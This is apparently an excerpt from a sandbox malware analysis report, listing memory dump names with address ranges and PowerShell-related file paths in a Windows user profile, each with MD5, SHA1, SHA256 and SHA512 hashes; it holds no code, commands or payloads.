memory/900-98-0x000002A27F080000-0x000002A27F0AC000-memory.dmp
memory/1008-103-0x000002C8B5270000-0x000002C8B529C000-memory.dmp
memory/900-92-0x000002A27F080000-0x000002A27F0AC000-memory.dmp
memory/740-87-0x000001F987C50000-0x000001F987C7C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 502fb5d3e73cc242e45bcc213facf317 |
| SHA1 | 044fe43dcc8327a481284f777041abd084c5690a |
| SHA256 | ad548c765f7737682e4d6a93f0d347722b3765e2b5ae4df6483428a48de56fec |
| SHA512 | ec5efcc5df243bc74f97ad27fc7300562217a13da0b718a74d140a73db5cf9e3702c52e8861c9cfaf453cc7e8705be61782cef0b644d98679fd4d7bc1d51e7d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d4c2854e165c109cde7e28fa9832f2e3 |
| SHA1 | 459d20474766c56264b37050d49b33771f74ef1e |
| SHA256 | 1f4c0110c5ac7d7081ba6803c75b3b60fde28193a955003e171c45f791c23b26 |
| SHA512 | 4fc5cb3d952f48c822f0a4a0f6ca41fe1344aab1529c2af35895e4b137d27ea2b0f92638333bb53487e181ac587a261d7d1d348b2146b6c7c8bde193685d08de |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2f15a817a9b28dd0ba88c67ff3d4dd3d |
| SHA1 | 0adc04e7418bf1fe171fe4722fddd9de872127e1 |
| SHA256 | 412a72f004275f9e4c5c287f9300d2d9983e9d3f3edde3756dc82b3bc16df01d |
| SHA512 | 9d4674d5c2109889e4592193410a37ebd924ec661d6319c41336f282c355377b74535b8d287aaef6e107b69156268fd5b147a6e9e4160c6404b3e4b00cfe68f9 |
memory/1084-952-0x00007FFAB4880000-0x00007FFAB526C000-memory.dmp
memory/1560-966-0x00000000005A0000-0x00000000005B6000-memory.dmp